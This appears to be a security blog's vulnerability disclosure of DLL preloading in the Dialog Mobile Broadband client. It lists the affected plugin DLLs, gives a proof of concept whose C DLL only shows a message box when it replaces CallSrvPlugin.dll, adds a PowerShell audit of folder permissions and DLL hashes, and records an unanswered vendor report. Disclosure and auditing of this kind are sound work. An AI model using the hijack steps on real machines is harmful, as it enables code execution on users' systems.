Adventures with Bits

DLL Preloading in Dialog Mobile Broadband


DLL preloading, also called a binary planting attack, works as follows: by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL, adversaries may execute their own malicious payloads. Often this location is the current working directory of the program. [1] As a result of a successful attack, adversaries may totally compromise the target. The attack vector and a successful attack rely on many factors that are beyond the control of the attacker; considering this, DLL preloading may not be a vulnerability. However, for the Dialog Mobile Broadband client application this is a different case.

Dialog Mobile Broadband is a pre-installed application delivered with USB dongles, which are used to access the internet. A user can use the Dialog Mobile Broadband application to interact with the USB dongle to connect to the internet. This application is used by financial institutions and even banks for their connectivity, therefore the impact of DLL preloading is high. Considering the use cases of this application, it is better to mitigate these kinds of risks.

Vulnerable Software Version: 23.015.11.01.297
Affected DLLs: CallSrvPlugin.dll, GpsSrvPlugin.dll, CallAppPlugin.dll, CallLogSrvPlugin.dll, WLANPlugin.dll and MDInterface.dll

PROOF OF CONCEPT
1. Compile the following code as a dynamic link library (DLL).
2. Rename it to CallSrvPlugin.dll.
3. Replace CallSrvPlugin.dll in "C:\Program Files (x86)\Dialog Mobile Broadband".
4. Launch Dialog Mobile Broadband.
5. A MessageBox appears, which verifies that the DLL hijacking is successful.

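
#include <windows.h>

/* Benign marker: shows a message box to prove the replaced DLL was loaded. */
int dll_hijack(void)
{
    MessageBoxA(0, "DLL Preloading in dialog mobile broadband", "DLL Message", MB_OK);
    return 0;
}

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved)
{
    /* Called by the loader, including when the host process loads this DLL. */
    dll_hijack();
    return TRUE;
}
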

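A defender-side check for the condition the proof of concept depends on, as an added example that is not part of the original post: it lists principals outside a trusted set that can write to the install directory or the affected DLLs, and records each DLL's Authenticode status and SHA-256 as a baseline for later comparison. The install path and DLL names are taken from the post; the trusted-SID list and the function name Get-WritableAce are assumptions.

```powershell
# Added audit example; not part of the original post.
# Install path and DLL names come from the post; the trusted-SID list is an assumption.
$InstallDir = 'C:\Program Files (x86)\Dialog Mobile Broadband'
$PluginDlls = 'CallSrvPlugin.dll', 'GpsSrvPlugin.dll', 'CallAppPlugin.dll',
              'CallLogSrvPlugin.dll', 'WLANPlugin.dll', 'MDInterface.dll'
$TrustedSids = @(
    'S-1-5-18',       # NT AUTHORITY\SYSTEM
    'S-1-5-32-544',   # BUILTIN\Administrators
    'S-1-3-0',        # CREATOR OWNER
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # TrustedInstaller
)
# Rights that allow creating, overwriting or swapping a file, plus GENERIC_WRITE / GENERIC_ALL.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership' -bor 0x40000000 -bor 0x10000000

function Get-WritableAce {
    # Returns Allow ACEs that grant write-type rights to a principal outside $TrustedSids.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier]) |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $TrustedSids -notcontains $_.IdentityReference.Value -and
            ([int]$_.FileSystemRights -band $WriteMask) -ne 0
        } |
        ForEach-Object {
            [pscustomobject]@{ Path = $Path; Sid = $_.IdentityReference.Value; Rights = $_.FileSystemRights }
        }
}

if (-not (Test-Path -LiteralPath $InstallDir)) { throw "Not installed: $InstallDir" }
$findings = @(Get-WritableAce -Path $InstallDir)
$baseline = foreach ($name in $PluginDlls) {
    $file = Join-Path $InstallDir $name
    if (-not (Test-Path -LiteralPath $file)) { continue }
    $findings += @(Get-WritableAce -Path $file)
    $sig = Get-AuthenticodeSignature -LiteralPath $file
    [pscustomobject]@{
        File      = $name
        Signature = $sig.Status                      # e.g. Valid, NotSigned, HashMismatch
        Signer    = $sig.SignerCertificate.Subject   # empty when the file is unsigned
        SHA256    = (Get-FileHash -LiteralPath $file -Algorithm SHA256).Hash
    }
}
$findings | Format-Table -AutoSize   # empty: only trusted principals can modify these files
$baseline | Format-Table -AutoSize   # store and diff against later runs
```

Run it on a host with the client installed. A changed hash or signature status for one of the listed DLLs between runs is the signal to investigate.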

Timeline
Initial Report Sent to the Vendor : 10/9/2017
No response from vendor after reminders
Vendor site : https://www.dialog.lk